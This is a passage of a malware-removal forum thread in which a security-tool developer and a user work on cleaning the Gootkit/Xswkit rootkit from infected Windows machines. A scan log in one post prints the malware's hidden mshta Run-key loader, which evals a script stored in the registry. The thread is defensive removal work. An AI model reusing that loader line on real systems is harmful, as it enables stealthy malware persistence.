Author Topic: [Gootkit/Xswkit] New rootkit found!  (Read 15117 times)

0 Members and 1 Guest are viewing this topic.

Reply #15January 02, 2015, 04:17:17 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #15 on: January 02, 2015, 04:17:17 pm »
mmh, wide inject. I think the key is protected by all the injected processes.
The only way would be to remove the key "offline". Like with an OTLPE cd: http://oldtimer.geekstogo.com/OTLPENet.exe

That's a CD ISO + burner software, that you can use to boot onto, and then it's a full windows environment.
If you're advanced user you'll find a regedit able to mount extern hives, let me know if you think to be able to do it.

Reply #16January 02, 2015, 04:45:52 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
« Last Edit: January 03, 2015, 01:30:58 pm by Tigzy »

Reply #17January 03, 2015, 01:31:49 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #17 on: January 03, 2015, 01:31:49 pm »
EP_X0FF has created a thread on kernel mode for that new infection, we're still analysing it, and searching its weaknesses.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669

Reply #18January 03, 2015, 03:33:30 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #18 on: January 03, 2015, 03:33:30 pm »
It looks like a simple Run value removal is enough to remove the malware.
Can you please confirm once again?

Reply #19January 03, 2015, 03:54:55 pm

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #19 on: January 03, 2015, 03:54:55 pm »
Here's the infection log from the beta version of RogueKiller. I can put it online for testing if you need.

Code: [Select]
RogueKiller V10.1.1.0 [Dec 23 2014] par Adlice Software
email : http://www.adlice.com/contact/
Remontées : http://forum.adlice.com
Site web : http://www.adlice.com/fr/logiciels/roguekiller/
Blog : http://www.adlice.com

Système d'exploitation : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Démarré en  : Mode normal
Utilisateur : tigzy [Administrateur]
Mode : Scan -- Date : 01/03/2015  15:37:17
Commutateurs : -nokill

¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]

¤¤¤ Registre : 10 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"  -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)

¤¤¤ Tâches : 0 ¤¤¤

¤¤¤ Fichiers : 0 ¤¤¤

¤¤¤ Fichier Hosts : 2 ¤¤¤
[C:\WINDOWS\System32\drivers\etc\hosts] 127.0.0.1       localhost
[C:\WINDOWS\System32\drivers\etc\hosts] ::1             localhost

¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)

¤¤¤ Navigateurs web : 0 ¤¤¤

¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 4086 MB
User = LL1 ... OK
User = LL2 ... OK

============================================
RKreport_SCN_01032015_152034.log

Reply #20January 05, 2015, 09:29:03 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #20 on: January 05, 2015, 09:29:03 am »
Hi!

Sounds good, it looks like that you've done a great job! Thank you very much!!

Yes, if you can give me the new version I will test it on our infected computers. I will be your BETA tester !! :D

Speak soon,


Johnny

Reply #21January 05, 2015, 09:32:04 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #21 on: January 05, 2015, 09:32:04 am »
No, simply deleting the RUN value doesn't stop the infection. It seems that there is still something in it that makes the explorer.exe crash in loop.

Reply #22January 05, 2015, 10:13:12 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #22 on: January 05, 2015, 10:13:12 am »
You may want to try that version: http://download.adlice.com/RogueKiller_beta.exe

Reply #23January 05, 2015, 10:32:26 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #23 on: January 05, 2015, 10:32:26 am »
Thanks! I've just downloaded it.

Need I start it in safe mode or normally? Does it clean all the infected hives or only the one with the program is started??

Sorry for the questions, but I want to be sure to use your tool with the best practice! ;)


Johnny

Reply #24January 05, 2015, 10:39:48 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #24 on: January 05, 2015, 10:39:48 am »
All the hives are cleaned.
In normal mode should be ok.

Should you need additional info: http://www.adlice.com/gootkitxswkit-removal-roguekiller/

Reply #25January 05, 2015, 11:04:53 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #25 on: January 05, 2015, 11:04:53 am »
Bad news :(

I have tested the BETA but it seems to fail to clean the infection. It can find it, start the remove but after the next reboot, the threat is back. We can spot it when we restart RogueKiller. You will find in attachment the two scan report, the first and the second after the cleaning/reboot.

Thanks for the help.


Johnny

Reply #26January 05, 2015, 11:08:14 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #26 on: January 05, 2015, 11:08:14 am »
Jojo51, any chance I could remote access on one of the infected computer with TeamViewer?
I think that rootkit did download some friend to join the party, and maybe it's protecting it. That's unusual, but very possible.
I'll send you an MP to meet on skype.

EDIT: The RUN key hasn't been found. Strange.
« Last Edit: January 05, 2015, 11:11:15 am by Tigzy »

Reply #27January 05, 2015, 11:28:37 am

Jojo51

  • Newbie

  • Offline
  • *

  • 12
  • Reputation:
    0
    • View Profile
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #27 on: January 05, 2015, 11:28:37 am »
Yes, no problems! :) We can plan a Teamviewer session on an infected computer today @03:00pm (french time).

You can use my email (**********) to add me in Skype, I'm logged on at the moment.

Does it sound ok for you?
« Last Edit: January 05, 2015, 11:32:49 am by Tigzy »

Reply #28January 05, 2015, 11:31:50 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #28 on: January 05, 2015, 11:31:50 am »
Will contact you on skype.
(I'm removing your address to avoid spam)

Reply #29January 06, 2015, 08:17:17 am

Tigzy

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 809
  • Reputation:
    91
  • Personal Text
    Owner, Adlice Software
    • View Profile
    • Adlice Software
Re: [Gootkit/Xswkit] New rootkit found!
« Reply #29 on: January 06, 2015, 08:17:17 am »
For those who were following, it's probably the bootkit version of Gootkit.
So MBR/VBR infection of type Rovnix.